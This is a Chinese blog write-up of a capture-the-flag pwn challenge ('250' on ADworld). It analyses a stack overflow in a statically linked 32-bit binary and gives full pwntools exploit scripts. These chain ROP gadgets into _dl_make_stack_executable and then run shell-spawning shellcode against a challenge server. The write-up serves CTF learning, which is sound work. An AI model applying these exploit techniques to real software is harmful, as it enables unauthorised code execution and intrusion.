ADworld pwn wp - 250

最新推荐文章于 2023-07-08 19:56:15 发布
最新推荐文章于 2023-07-08 19:56:15 发布
阅读量120 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/120249366
版权

前言

一道非典型栈溢出题目

分析过程

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [esp-Ch] [ebp-24h]
  char v5; // [esp-Ch] [ebp-24h]
  int v6; // [esp+Ch] [ebp-Ch] BYREF

  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  printf("SSCTF[InPut Data Size]", v4);
  _isoc99_scanf("%d", &v6);
  temp = malloc(v6);
  printf("SSCTF[YourData]", v5);
  read(0, temp, v6);
  puts("[Ok!]");
  print(temp, v6);
  return 0;
}

在这里插入图片描述

流程很简单, 一次输入

这里有个栈溢出漏洞, 将任意长的字符串拷贝到v3, v3是定长58, 又没开canary, 所以存在溢出

int __cdecl print(int a1, int a2)
{
  char v3[58]; // [esp+Eh] [ebp-3Ah] BYREF

  memcpy(v3, a1, a2);
  return puts(v3);
}

漏洞利用

开了NX, 没有后门, 静态编译, 所以不能ret2shellcode, ret2text, ret2libc, 几乎所有栈漏洞的打法都走不通, 那就只能用高级打法, 类似mprotect的利用方法, 修改栈可执行, 写入shellcode, 然后ret2shellcode
因为是静态编译的, 所以可用函数不少

在这里插入图片描述

找到一个有用的函数, 可以修改栈可执行, 那么利用栈溢出到这里, 修改之后再返回到shellcode的位置
不过为了调用这个函数, 需要满足ecx == libc_stack_end, 也就是[eax] == libc_stack_end, 上面有一个mov ecx, [eax]

在这里插入图片描述

如果向eax写入libc_stack_end的地址0x080EAFC8, 那么就可以绕过检测

在这里插入图片描述
找找eax的gadget
在这里插入图片描述

不过直接调用pop_eax设置eax然后返回到函数_dl_make_stack_executable的payload打不通, 这里借鉴已有的题解思路来打, 从_dl_make_stack_executable_hook调用, 设置_dl_make_stack_executable_hook的值加1, 即与原来的值不等, 这样_dl_make_stack_executable函数执行完之后返回就到ROP链继续执行, 所以需要一个gadget在ecx控制_dl_make_stack_executable_hook, 然后一个gadget使ecx加1

在这里插入图片描述
在这里插入图片描述

这里还有个点注意, 就是写入eax应该是__libc_stack_end的地址-0x18的结果, 这样+0x18之后正好是__libc_stack_end的地址, [eax]就是正好取__libc_stack_end的值
在这里插入图片描述

而这个__libc_stack_end的地址是在0x080A0B05地址处
在这里插入图片描述

这样所有的信息就收集齐了, 可以写exp

from pwn import *
from LibcSearcher import *

url, port = "111.200.241.244", 56914
filename = "./pwn"
elf = ELF(filename)
# libc = ELF("")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def BK():
    gdb.attach(io)
    pause()

def pwn():
    jmp_esp_addr = 0x080de2bb 
    pop_ecx_addr = 0x080df1b9
    call_make_stack_executable_addr = 0x0809A260
    _dl_make_stack_executable_hook_addr = elf.sym['_dl_make_stack_executable_hook']
    inc_dword_ecx_addr = 0x080845f8
    libc_stack_end_addr = 0x080A0B05

    payload = cyclic(0x3A) + p32(libc_stack_end_addr - 0x18) + p32(pop_ecx_addr)
    payload += p32(_dl_make_stack_executable_hook_addr) + p32(inc_dword_ecx_addr)
    payload += p32(call_make_stack_executable_addr) + p32(jmp_esp_addr) + asm(shellcraft.sh())
    # payload = payload.ljust(0x100, b"\x00")

    io.sendlineafter('SSCTF[InPut Data Size]',str(0x100))  
    io.sendlineafter("SSCTF[YourData]", payload)
    # BK()
    sleep(0.1)
    io.interactive()

if __name__ == "__main__":
    pwn()

总结

卡点

(1) 想用pop_eax直接调用函数, 但是打不通

from pwn import *
from LibcSearcher import *

url, port = "11.200.241.244", 56914
filename = "./pwn"
elf = ELF(filename)
# libc = ELF("")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

debug = 1
if debug:
    context.log_level="debug"
    io = process(filename)
    context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def BK():
    gdb.attach(io)
    pause()

def pwn():
    jmp_esp_addr = 0x080de2bb 
    pop_eax_addr = 0x080b89e6
    libc_stack_end_addr = 0x080EAFC8
    _dl_make_stack_executable_addr = elf.sym['_dl_make_stack_executable']

    payload = cyclic(0x3A + 4) + p32(pop_eax_addr) + p32(libc_stack_end_addr)
    payload += p32(_dl_make_stack_executable_addr) + p32(jmp_esp_addr) + asm(shellcraft.sh())
    # payload = payload.ljust(0x100, b"\x00")

    io.sendlineafter('SSCTF[InPut Data Size]',str(0x100))  
    io.sendlineafter("SSCTF[YourData]", payload)
    # BK()
    sleep(0.1)
    io.interactive()

if __name__ == "__main__":
    pwn()

之后只能用大佬的方法打通了
不过也因为不能调试, 所以找不到bug在哪
在这里插入图片描述

(2) 注意是inc [ecx], ret, 不是inc ecx, ret, 控制的是ecx中的地址的值, 不是ecx本身的值

以后遇到静态编译的题, 可以把函数表看一遍, 兴许能找到可以利用的函数

参考

https://blog.csdn.net/qq_43986365/article/details/105056413

https://blog.csdn.net/seaaseesa/article/details/104188302

fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwn wp 6 - 10
fa1c4的blog
05-15 306
jarvisoj_level0 栈溢出, 且到RBP的偏移为0x80, 查找字符串发现有"/bin/sh" 索引到引用的函数, 查看地址是 直接ret2text, 劫持执行流到后门函数即可, 因为是64系统, 所以需要平衡栈, 劫持到后门函数的第二条指令(跳过push RBP), 或者在EBP覆盖retn指令地址, 弹出一个字长内容. from pwn import * URL = "node3.buuoj.cn" PORT = 26152 sel = 1 io = process('./le
not_the_same_3dsctf_2016【简单解法和mprotect解法】
qq_41696518的博客
08-29 659
not_the_same_3dsctf_2016,含mprotect解法和常规解法
SyntaxError: return outside function
逐梦人.的博客
10-10 1887
这种语法错误一般出现在return没有在函数内部写,而写在了函数外部或者没有定义函数的时候使用了,这种就会报错。
pwn刷题num30----栈溢出修改栈上参数 或 mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-27 1918
BUUCTF-PWN-get_started_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表仍可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 Qual a palavrinha magica? 中文意思是 什么是神奇的词? 很奇怪,ida看一下伪代码 栈溢出,gets函数输入字符串给v4,未限制输入的
pwn学习(四)
qq_37439229的博客
10-04 243
今天复现了gactf的simulator,lc3的的汇编感觉和mips满像的 pwn方面看了brop,感觉只有盲打有用,感觉对一个re手并不需要,算了就当看看吧 在刷题上,位只能说今天做的三道题都和格式化字符串有关,我都不会(好菜阿),但是学到了很多,不得不说格式化字符串好不熟练阿。。。。 others_baby_stack from pwn import * p = remote('node3.buuoj.cn',28992) #p = process('./main') elf = ELF('./mai
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
adworld-wargame 我对上的pwn挑战的利用
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
Adworld2009互动营销年度盛典English介绍
09-18
Adworld2009互动营销年度盛典English介绍
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
pwn刷题num34---mprotect修改内存权限 + ret2shellcode
tbsqigongzi的博客
04-28 1894
BUUCTF-PWN-not_the_same_3dsctf_2016 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 静态链接 ida一下 gets函数明显的栈溢出,v4只有0x2D大小,gets函数对输入的字符串没有大小限制 看一下栈区 v4距离返回地址(r所在位置)0x2d个字节 找
攻防世界PWN250题解
seaaseesa的博客
02-05 1028
250 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序存在明显的栈溢出漏洞 并且glibc被静态编译到了程序中 由于没有开启PIE,且glibc被静态编译包含,那么我们有很多方式get shell,这里,我们使用的是dl_make_stack_executable使得栈变得可执行,然后在栈里布下shellcode来getshell 为了节省步骤,我们直接...
pwn的一些技巧与总结
weixin_30477797的博客
09-27 855
原文地址:https://github.com/Naetw/CTF-pwn-tips 目录 溢出 在gdb中寻找字符串 二进制服务 找到libc中特定函数的偏移地址 Find '/bin/sh' or 'sh' in library Leak stack address gdb中的fork问题 Secret of a mysterious section - .tls Predictable R...
CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)
最新发布
T1ngSh0w的博客
07-08 1176
ctfshow-pwn入门-栈溢出pwn49-mprotect函数静态链接pwn的应用
Pwn
bluestar628的博客
07-11 2458
Pwn1拿到程序IDA分析发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系所以利用代码如下:from pwn import * p = remote ("139.224.220.67" ,30004) payload = 'a'*0x501 p.sendline(payload) p.interactive()Pwn2打开IDA分析,是一个经...
pwntools中fmtstr的使用
fa1c4的blog
02-01 3625
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3209
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
kali安装checksec
fa1c4的blog
01-26 3108
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3016
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2879
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值